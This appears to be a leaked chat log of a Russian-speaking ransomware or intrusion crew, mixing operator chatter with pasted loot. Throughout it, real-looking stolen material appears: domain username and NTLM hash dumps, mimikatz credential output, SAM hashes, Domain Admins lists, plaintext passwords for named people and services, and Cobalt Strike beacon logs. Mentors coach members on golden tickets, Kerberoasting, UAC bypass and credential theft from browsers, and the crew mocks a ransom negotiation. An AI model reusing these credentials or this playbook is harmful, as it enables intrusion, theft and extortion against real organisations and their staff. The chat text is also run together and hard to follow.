CORP\kigarciap:::e0d8d7fcb35d2ef4920964532118f4f3:::
CORP\aftapiam:::0246bdc62f0e2c396384b592ef3be354:::
CORP\rsolanobau:::9d057d6ae0251a7c6d0674b26c9aa75c:::
CORP\Vmorenov:::a5bcd1c15d403fbf5c792c66f202e622:::
CORP\jccanoa:::78b75076afd20b0c1765db06e49c9715:::
CORP\clmendozav:::c933798f947972ca9d08ba805008d6ca:::
CORP\evazquezpr:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\Gcastillom:::2441d700356f3ab1d0714db1e9844e60:::
CORP\cagiront:::749ceaca0433d984e0b78c7599a42886:::
CORP\cihernandeza:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\Csegovia:::4efa1df1fdfb9a4ffbda0d00e840ede2::
CORP\Jrivass:::30fe4ab34ce80404f75465fb1b8cb12a:::
CORP\jrortizc:::fff70ea26ce69ae4c02bdce9ef8a4f61:::
CORP\ndjesusg:::34f21309ef327ecd9a852cfb510f4e6d:::
CORP\prangell:::4c07f34762110fa682bd0c6ef54e010d:::
CORP\iperezj:::f651f76a6a087c44698d7741b69c8fa3:::
CORP\Mfremontp:::c4f89225237628041d2303a26ee14007:::
CORP\cmgarciaa:::2029d906714ba0e913d30998533c9063:::
CORP\lgtoledol:::fe2969a54e98a468459022084143e1ec:::
CORP\jvelazquezg:::956e44f5069e8f0161ea7064840894ff:::
CORP\Aventuraj:::5d1dd74b6aeba7121e9324b1285d3739:::
CORP\Fmartinezg:::d9e8da2bb0bf67e9d076f09e29b26a1a:::
CORP\aloar:::4affd6e3e410086d3118d4dfa2ff931a:::
CORP\rcervantesm:::afd011d72ad1a55831d75f33be36d105:::
CORP\Jgonzalezv:::bec80eaa1dcee1f870dfc02808aa1afb:::
CORP\iaguilarr:::4548dea50cdb68bb9e206e4ac758edf3:::
CORP\crayonrod:::9675375a5bd161cd3ca09b9da344b372:::
CORP\jbarrerame:::587ddf743d86b13146415c77106686cf:::
CORP\jmpuentesc:::f93291f941f5387b4dde806e44970a62:::
CORP\chhbautistar:::ecb44fba43525518fd81fbf4453d650b:::
CORP\ammezar:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\gadiazc:::0e4c74096d9998c7a537509f481ee9da:::
CORP\sicabreram:::80537e6fc5a1f37f6ea4b0210af893c5:::
CORP\legutierrezg:::8a40ed074d59774f020fca6ac58d44d5:::
CORP\aafloresga:::986c69e34ac0935fcd39130ff05ad035:::
CORP\vigomezar:::6003c2feccf5eda3bdd18e373885524b:::
CORP\gemorenop:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\eamunozc:::decb62a34748b1dbbfc29124b545cfbc:::
CORP\gafloresso:::cac5c182593a480a05ba20a4e3b197a5:::
CORP\vperezg:::2e8b36ddd8932fa1bf97fa477d5bc565:::
CORP\jorget_wipro:::6460ac17a883c93ed07db8434ddc3f03:::
FILIAL\bmramirezs:::28ccd6f27c8c92346957931f94a1075d:::
FILIAL\pvhernandeza:::8aab1daa12e415eb9a9ad3cbf1692d71:::
FILIAL\Anavarretea:::5cb20c880326791e424fc9f2554ae9b4:::
FILIAL\RociodelaLuzC:::2f4b6c1b63ab9540eb7e087bc0cc2e61:::
```pcsb.org - конфу плзу @user3 впн в работе, можешь к нему+дав смысле помогать?в саппорт)[ ](https://mediaeveryone.com/channel/general?msg=M3Wiw2qsSajQRKZ29) это куда?если сегодня обновят конфиги по впнам, дам в работупока переходи в сапугу(ушла домой тётя, видимо...+разобрали?обнова инжектораобновление разберитедаесть новая коба?я1 человек нужендобавьте в чатили в `CORPSFECRT04` если будет доступенкрч, если впн включен сразу прыгаем в `CORPKIOVDAPGM01`поставилкинул вышедайте шелкодтелевиза прилетел[ ](https://mediaeveryone.com/channel/general?msg=8oQfYvwK867aCbLo3) Обед затяжнойда я в аптеку гонял)
после доставки так сказать, сразу за активирваным углемя тутпришли на работу, пообедали и домой)пообедали...все резко ушли)да блять)@user7 курить пошеля один тут))тогда @user7 дай шелкод[ ](https://mediaeveryone.com/channel/general?msg=qn5jrsA9jZxjAvG76) до магазина видимогу выдать 1 кобу на заменунадолго?он вышел@user9 у тебя только коба вчера умерла?у меня уже грязная капец...вроде только вудукакие кобы вчера в локе учавствовали?дай шелкода позже будут?пока выдать доп нечего(у повторно прогоняюу всех мимо?делай через старый дизайнсейчас весь список переберу и отпишусьхрень какато+@user7 тоже впн@user3 выдам впн для работытак, у нас 2 человека без дел?ну и инвей повешу, правда пока н определился гдепробую все таки определить кто админ, что бы уж определиться - аутсорс у них или нета что в sccy помимо мониторинга?в sccy user4, там же мониторинг
я только в snuв sccy яостальные чем заняты?@user9 в snu и sccyтак на счет сегодняа чет не помню там вообще скулей
проверюскуль сплойты?да я там все проверил
нет уязвимостей
ms17, net_api, smbghost, rdp эксплойтыsccy мониторинг, snu.edu что там осталось проверить?по поводу ваших текущих, там разве есть, что делать?неа, зашли и проверили записку, но больше ничего от skytech не слышно?
у меня есть одна сессия от туда, ни дк, ничего не пингуетсяесть впн snu.edusccy из активнхКакой?у меня на тебя впн выписан, но не вижу инфы о нем никакойЗадавайи у меня к тебе пара вопросовдавай))Как миниму кофе выпитьну задачи текущие какие?не понялу тебя как раз работы нет?)Полагаю в путиа где все?hiВсем приветВисит`wb.zhangna:Zhangna123`net accounts))
```
强制用户在时间到期之后多久必须注销?: 从不
密码最短使用期限(天): 0
密码最长使用期限(天): 42
密码长度最小值: 0
保持的密码历史记录长度: None
锁定阈值: 从不
锁定持续时间(分): 2
锁定观测窗口(分): 2
计算机角色: WORKSTATION
命令成功完成。
``DC
```
Domain Controllers:
Server Name IP Address
----------- ----------
HZ-DC03 10.246.3.33
HZ-DC04 10.246.3.34
BJ-DC03 10.238.8.100
BJ-DC04 10.238.0.100
HZ-EQDC08 10.246.101.34
HZ-EQDC07 10.246.101.33
``````
Authentication Id: 0; 554893 (000000:0008778d)
Session : Interactive from 1
User Name : wb.zhangna
Domain : CN
Logon Server : HZ-EQDC08
Logon Time : 2020/10/26 23:27:44
SID : S-1-5-21-1380817616-3362833225-652976467-106526
msv :
[00000003] Primary
* Username : wb.zhangna
* Domain : CN
* NTLM : 985de1088d5d619c783802e87d1dfea1
* SHA1 : 89d60fa07d36dc39fbf2f516b74514db08e25b38
* DPAPI: c5af9cdc18387afefdc1024f86b99ed1
tspkg :
wdigest:
* Username : wb.zhangna
* Domain : CN
* Password : (null)
kerberos :
* Username : wb.zhangna
* Domain : CN.NET.NTES
* Password : (null)
ssp :
credman:
Authentication Id: 0; 553900 (000000:000873ac)
Session : Interactive from 1
User Name : wb.zhangna
Domain : CN
Logon Server : HZ-EQDC08
Logon Time : 2020/10/26 23:27:44
SID : S-1-5-21-1380817616-3362833225-652976467-106526
msv :
[00000003] Primary
* Username : wb.zhangna
* Domain : CN
* NTLM : 985de1088d5d619c783802e87d1dfea1
* SHA1 : 89d60fa07d36dc39fbf2f516b74514db08e25b38
* DPAPI: c5af9cdc18387afefdc1024f86b99ed1
tspkg :
wdigest:
* Username : wb.zhangna
* Domain : CN
* Password : (null)
kerberos :
* Username : wb.zhangna
* Domain : CN.NET.NTES
* Password : (null)
ssp :
credman:
Authentication Id: 0; 92375 (000000:000168d7)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2020/10/26 23:27:37
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : HIH-D-22925
* Domain : CN
* NTLM : 3909fbffc2df0e29ce348893f4a18b95
* SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a
tspkg:
wdigest:
* Username : HIH-D-22925
* Domain : CN
* Password : (null)
kerberos :
* Username : HIH-D-22925$
* Domain : cn.net.ntes
* Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21
ssp :
CREDMAN:
Authentication Id: 0; 92331 (000000:000168ab)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2020/10/26 23:27:37
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : HIH-D-22925
* Domain : CN
* NTLM : 3909fbffc2df0e29ce348893f4a18b95
* SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a
tspkg:
wdigest:
* Username : HIH-D-22925
* Domain : CN
* Password : (null)
kerberos :
* Username : HIH-D-22925$
* Domain : cn.net.ntes
* Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21
ssp :
CREDMAN:
Authentication Id: 0; 996 (000000:000003e4)
Session : Service from 0
User Name : HIH-D-22925
Domain : CN
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-20
msv :
[00000003] Primary
* Username : HIH-D-22925
* Domain : CN
* NTLM : 3909fbffc2df0e29ce348893f4a18b95
* SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a
tspkg:
wdigest:
* Username : HIH-D-22925
* Domain : CN
* Password : (null)
kerberos :
* Username : hih-d-22925$
* Domain : CN.NET.NTES
* Password : (null)
ssp :
credman:
Authentication Id: 0; 997 (000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-19
msv :
tspkg:
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman:
Authentication Id : 0 ; 63722 (000000:0000f8ea)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : HIH-D-22925
* Domain : CN
* NTLM : 3909fbffc2df0e29ce348893f4a18b95
* SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a
tspkg:
wdigest:
* Username : HIH-D-22925
* Domain : CN
* Password : (null)
kerberos :
* Username : HIH-D-22925$
* Domain : cn.net.ntes
* Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21
ssp :
CREDMAN:
Authentication Id: 0; 63689 (000000:0000f8c9)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : HIH-D-22925
* Domain : CN
* NTLM : 3909fbffc2df0e29ce348893f4a18b95
* SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a
tspkg:
wdigest:
* Username : HIH-D-22925
* Domain : CN
* Password : (null)
kerberos :
* Username : HIH-D-22925$
* Domain : cn.net.ntes
* Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21
ssp :
CREDMAN:
Authentication Id: 0; 62665 (000000:0000f4c9)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID :
MVS:
[00000003] Primary
* Username : HIH-D-22925
* Domain : CN
* NTLM : 3909fbffc2df0e29ce348893f4a18b95
* SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a
tspkg:
wdigest:
kerberos:
ssp :
credman:
Authentication Id: 0; 999 (000000:000003e7)
Session : UndefinedLogonType from 0
User Name : HIH-D-22925
Domain : CN
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-18
msv :
tspkg:
wdigest :
* Username : HIH-D-22925
* Domain : CN
* Password : (null)
kerberos :
* Username : hih-d-22925$
* Domain : CN.NET.NTES
* Password : (null)
ssp :
credman:
``````
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ab374db304924054507dd9a9a5b513fd:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:cab016c9f1758dc8dc18600415e33576:::
```ДА
```
这项请求将在域 cn.net.ntes 的域控制器处理。
组名 Domain Admins
注释 指定的域管理员
成员
-------------------------------------------------------------------------------
B6823 cnadmin H10151
luot ntes.cn sileiy
winbjplan
命令成功完成。
``Тогда не понимаю в чем проблема)Считаютсялаба/дедик не считаются?У нас нет виндыи?Она же виндоваявот такую штукуи https://github.com/quasar/Quasarтак, тогда возьмите на тесты empire))тул кит потестили))Нет.Нета какие были/есть?По каким @tl1Приветчто по задачам?птПриветВсем приветВстал┌─[input0@parrot]─[~]
└─╼ $ping helpdocpt.club
PING helpdocpt.club (162.0.237.18) 56(84) bytes of data.
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=1 ttl=52 time=206 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=2 ttl=52 time=207 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=3 ttl=52 time=208 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=4 ttl=52 time=414 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=5 ttl=52 time=207 msагадомен форума лежит?hiо приветвечер добрый:space_invader:ахахага
видимо феды им не дадут заплатить(ахахаха``
jana dare: what in the hell
HIDE
49 seconds ago
Support: Hello, are you ready to negotiate?
HIDE
47 seconds ago
jana dare: fuck off
HIDE
```судя по скрину в generalя не знаю)они федералам писалиэто хелсы?04 дапришли на ваш акк
у вас же user04 ?твои парни?pPUnKg2arjexHCi0b6xUm3djAKFrW38CnwoPCirPeZWxAeMRnUXr4Fa7DUxoxbKRспокдавай спокойной)ага)а я уже передам тару)прогони адюзерс через скрипт, в архив и его сюдапускатьпировать ваще не понимаю че происходит
самые простые действия могу делатьда и это был не вопросили*никаких вопросов)так, еще вопросы? иди могу идти?там в пределах суток все будета так залей на файлобменника ну похуй кину сюда ссыль с пасомдо 100 метров на сколько знаюлимита нету на размер?а сюда аплоадится нормально файло да?как приду передам тарукинь в офф сюдагыг
я тоже
сутки сижу ужезакину тебе архивчик да? а то тар молчита я уже умираю)окейага
сейчас посижу поделаю тогда твоим парсером еще пачечку того что переоткрыть можно+остальные?+++У всех личные кобы есть?:thumbsup:найдете ДА будем там двигаться дальшеближайшеие пару часов+пока работаем с matches+Возвращамсяприятного аппетитачерез пол часа продолжимхорошопол часаокей, сколько по времени? час?скорее да чем нет)перекус)нам не говорили за обеды в эти два днятак, у вас обед?пока нетеще вопросы?вы берете хеш krbtgt и делаете себе тикет на любого ДА и вы на коне)прошло Н времени, может даже на след день и у всех ДА сменили пароливы сняли дамп хешей с дксуть вот в чемв том числе и от ДА2) он позволят сделать токен от любого пользователя))1) если вы достали хеш от krbtgt, то у вас уже дампнут сам дк) не встречал случаев когда ге то на диске лежал бы файлик `хеш от krbtgt (не читать).txt`тоже хороший вопроса если мы достали хэш Krbtgt пользователя
мы ведь можем делать голден тикет, что с этим можно сделать?как и с ntlm хешами, вы кидаете в конфу - получаете пасскак только получил пасс сразу вам передал``
emeralmatherials.com
```
вот утвот был кеб
```
$EPM.LOCAL$MSSQLSvc/SDCEPMVMQAPV02.EPM.LOCAL*$:Fujitsu2012
``потому что слишком серьезный пасс и брут не берет)вот домены в архиве лежат, мы брали керберос, но закончить и без него вышло, это всё к неидентичности, окей. Ситауация, есть только керберос хэш, что с ним делать? Куда стучаться?уже лучше вопросокей, встречный вопрос, смысл доставать керберос хэши, если мы их не использовали ни разу?справки по модулям у вас нет? гита нет?да, знаний касательно векторов и того можно и нельзявам дают полезные модули, ваша задача их изучить, задокументировать, проверить использовать в практикахэто должны делать вызадача в другомя могу хоть по каждому модулю все раписатьесли вы не изучаете модули которые дают то какой смысл?https://cisoclub.ru/kerberoasting/может ты нам и скажешь?более детально, что за хеши, откуда, чьи, как они там оказались, почему они не везде одинаковые и т ддает то вывод в консольможно написать еще "дает то вывод в консоль")собирает хэши из памяти, как и все остальное, в принциперосто к слову, как работает invoke-kerberoast?и еще, чем лучше вы знаете как работает сама сеть вместе с Active Directory тем лучше понимание того, что можно в ней делатьмы вам даем только основу, показать что вот так можно делать, но не всегда обязательнотем лучше соображаете в контексте задачи всего векторапоэтому чем больше тренеруетесь делать юак байпас, искать себе сами модули под задачи на гите, читать гайды и т дкак и все остальное по сутиэто лечится только опытом)невнимательностьбывает по 3-6 раз тыкаете в надежде, что поменяетсявы не читаете выводы командможно тогда на время обеда добавить в наш арсинал больше тулзов ? по сидим некоторые поизучаем на обеде[ ](https://mediaeveryone.com/channel/general?msg=HY3ZumpXaCbLmxJPw) из того что я увидел[ ](https://mediaeveryone.com/channel/general?msg=QTfEBz7jkqkEardwe) ну даже привести прохождение игры в пример, в какой-нибудь зельде не можешь пройти загадку, глянул на ютубе прохождение и вот уже продвинулся
только здесь с анализом, послушать рассуждения, какие-то фичи у "набитой руки" прихватитьи потом будем разбирать новый материалпосле обеда еще вопросы на пару часовможете тогда пока на уйтине обговаривалосьу вас обед на час смещен? или вы уходите?[ ](https://mediaeveryone.com/channel/general?msg=WKA2Jom9LuADmvBea) такой же перебор модулей на основе условий стартовой среды, просто быстрее будет т к рука набита)2-5) для начала поискать аналоги команды на том же гите в c# .net приложении, потом сторонние модули которые можно импортировать и крайний случай - загрузить к себе на дедик этот модуль, взять исходный файл и перенести руками в папку модулей на целевой машине - выполнить нужные действия - почистить за собойразличия это понятно, просто неимоверно интересно глянуть на проходку хотя бы одной сети прям в полевых условиях с рассуждениями, а не как все в интернете на своей лабе без запинок2-3) собрать у себя ехе вариант и запустить тамеще вопросы?потому что вы дальше PE не ходили, но сегодня пойдем[ ](https://mediaeveryone.com/channel/general?msg=5sWj3jXdCZqfa2LGg) уже на lp могут быть различия на стадии UAC например, на стадии отключения доменав контексте EA так вобще не было опытакстати, да, действительно бы крайне интересно посмотреть, как работает кто более професиональный чем мыне идентичны сесии, идентичны действия*понятное дело не идентичны, но алгоритм в разных контекстах примерно один и тот же
low priv - собрать то, что доступно
LA/System - мимик и прочие более серьёзные вещи
DA - кроме dcsync'a мы и не пользовались ничем
Просто для контекстов действия по сути идентичны, может мы работаем не как надо, а может так оно и естьну это понятно что ситуации различные бывают и всё жемы с вами не просто так расширяем арсенал, методы, структуризируемгде-то вас выкинет АВ за 5 минут любой активности и т дгде-то ничего из модулей вообще не сработаетгде то можно сбрутить kerberoast за 10 минутвы же понимаете что сессии далеко не идентичныда, от появления сессии до ДКкстати где 2 пользователя еще?вопрос на уровне "а что если бы сталин был жив сейчас "к примеру поднятие привелегий за средню жизнь одной сесии от 1 минуты до 4 часов?ну разок со стороны посмотретьчто делать после появления первой сесии?порядка действий чего?)ну порядка действийкаких именно действий?а будет ли проведён "мастер класс" с описанием действий?[ ](https://mediaeveryone.com/channel/general?msg=guBDpNRBxZXHDQioL) не знаю что именно тут расписывать - то, что требуется в контексте пользователя или привязано к нему (браузеры, winscp, putty etc) делаете из контекста пользователя, то что требует систем прав (хешдамп, logonpassword) из систем[ ](https://mediaeveryone.com/channel/general?msg=u8SJcuXGnrkeCtBXb) пожалуста ответьте на вопростакое вполне можеть когда уже все перепробовали[ ](https://mediaeveryone.com/channel/general?msg=2JB9BEAgsYLjYY8Ae) ни разу ей не пользовался, но она в любом случае должна быть у вас в арсенале по той причине, что возможно она станет последней уязвимостью, чтобы поднять права)у вас составлен mindmap и вы можете по пункту на котором вы сейчас искать нужную инфу[ ](https://mediaeveryone.com/channel/general?msg=XTmBDzwfkSKsKXJHh) зависит от задачи. если у вас вылетает сессия - вы смотрите какой АВ, если вам надо зайти по рдп на целевую машину - idletime, etcмаксимально полезная инфа это именно пароли и хеши, т к у вас как минимум будет словарь для брута, а как максимум уже от системы пытаться дотянуться до других хешей/паролейдля этого вы будете использовать сплоиты, юак байпасс, spoolsv и т ддасуть в том, что вы не сможете сделать хешдамп без систем прав верно?пароли, хешитак я поэтому и задал вопрос, на что обращать вниманиев винпис много инфы касаемо поднятия привилегий через dllhijack - эта техника вообще, насколько часто используется в ральной жизни? есть смысл на нее заморачиваться?плохо анализируете инфукак же тут оказался пароль...```
Target : MicrosoftOffice16_Data:orgid:simon.bolley@gpj.com
UserName :
Password : Canada!75
CredentialType : Generic
PersistenceType : LocalComputer
LastWriteTime : 1/21/2020 9:16:27 AM
``сходу открываем ваш ситбэлт на gpjконечно))ни разу в winPEAS и seatbelt пароли не попадались вродена эти вопросы отвечают модули вышевопрос в том где они и как их достатьмаксимальная польза - пароливот по наблюдениям, что вытаскивал из них в чат я, что было полезно и что стоило вытащить, что стоилоя имею ввиду помимо там списка шар, AV и прочего, что будет полезно вытащить?там все по категориям расписаносразу ссылка на сайт с описанием
```
https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
``````
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
``[ ](https://mediaeveryone.com/channel/general?msg=QgGf843gNp4ZJSSBb) как вариант idletime чтобы проверить когда была последня активность пользователя перед тем как зайти по рдп2-1) получили ошибку - загуглили, со временем выучите популярные ошибки (cobaltstrike error 5 - If you get an error 5 (access denied) after you try to link to a Beacon)
2-2) на пароли и "интересные" файлы, которые могут содержать пароли. так же вы можете поискать внутренние порталы которые могут быть уязвимы (аля sql injection), что позволит вам открыть себе сессию уже на сервере
2-3) не понял вопроса
2-4) пока оставим вопрос
2-5) не понял вопроса
2-6) коба добавляет эту инфу, когда сканируете через portscan хосты и коба видит ОС, она автоматически добавит его в Targets, команда Hashdump добавит хеши и т дда, тип помимо дефолтных AdFInd и прочих сборщиков, что можно в low priv юзать?можно расписать по тулсам какие лучше использовать на каких контекстахпро 2-2 поддерживаю, может в `group` вместо `all` имет смысл указывать другое что-то в некоторых случаях?
То же про winPEAS, вывод гигантский, но что маскимально полезно вытаскивать?сначала вопросы по уже имеющимся знаниям и опытуок, тогда как понимать `разбирать нетворк` ?для начала поймем что значит `разбирать нетворк`, а там суть подхватите и уже будем разбирать векторы)ВладиславХолдинг в телеге говорил что нас учили разбирать нетворк, какие тулзы лучше использовать и в каких случаях (хотя бы парочку для более детального их изучения)по поводу 1, я могу предположить судя по тому как вы работаете, что вы после создания токенов не возвращаете себе изначальный контекст. А модули требуют запросы в домен`psinject` - `This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process`1) Это взято с PowerView через psinject :^), но дело в том, что она выскакивала и с Invoke-Kerberoast, и SMBAutoBruteThis release integrates Lee's work with Beacon. The `powerpick [cmdlet+args]` command will spawn a process, inject the Unmanaged PowerShell magic into it, and run the requested command.
I've also added `psinject [pid] [arch] [command]` to Beacon as well. This command will inject the Unmanaged PowerShell DLL into a specific process and run the command you request. This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process1) что за модуль?
2) все возможности на оф странице гита и там понятная справка)
3) psinject выполняет пш код в другом процесе, что исключает возможность убить сессию если исполнение пш кода детектится в системе
4) не знаю, никогда не использовал этот аргумент)
5) `execute-assembly /SharpChrome.exe logins /showall`1. Эта ошибка:
```
ERROR: Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect.
ERROR: "
ERROR: At line:13117 char:24
ERROR: + else { $Results = $GPOSearcher.FindAll() }
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DirectoryServicesCOMException
ERROR:
```
В чём ее проблема? Как её обходить? Что она значит?
2. "рубеус более серьезный инструмент ;-)"
Какие у него ещё есть функции помимо asreproast и kerberoast?
В чём основная разница между powerpick и psinject, если вы говорите, что второе лучше первого,
но при этом вчера в PowerView первое отработало, в отличие от второго?
Какой смысл аргумента` /privileges:enable` у `wmic`, если указывать креды ЛА/ДА?
5. Как работать с SharpChrome, не SharpWeb, а именно Chrome. У него самая понятная справка, сколько попыток не было - тщетнотак ну что?20 минут подготовить списокпервый час будем разбирать общие вопросы касательно софта, векторов и т дhi:space_invader:Доброе утродоброй, ждем пока что, на этой недели получим и сесси и новый инструмент.шо по сессиям?всем добрый день )может на спэйс ворк креды найдучерез эту прогу он бэкапит только на комп, ищу в браузере может что будета проверь настройки облачной синхронизации пожалуйстаон бэкапин на san1?а посмотри плиз дату установки софталол)еще чуть-чуть``
Teemo[FILES]Administrator */4144|2021Feb02 02:03:39> idle
[Tasked beacon to run .NET program: IdleTime.exe
[+] host called home, sent: 111147 bytes
[+] received output:
CurrentUser : FILES\Administrator
Idletime : 08h:09m:20s:125ms (0 milliseconds)
```
пока нет)хочешь по рдп завалиться и посмотреть гуй?такое бывает, попробуйте с другой тачки кинутьПрокся как живая некоторые страницы по пять минут открываетадминку не нашли?)интересная штука``
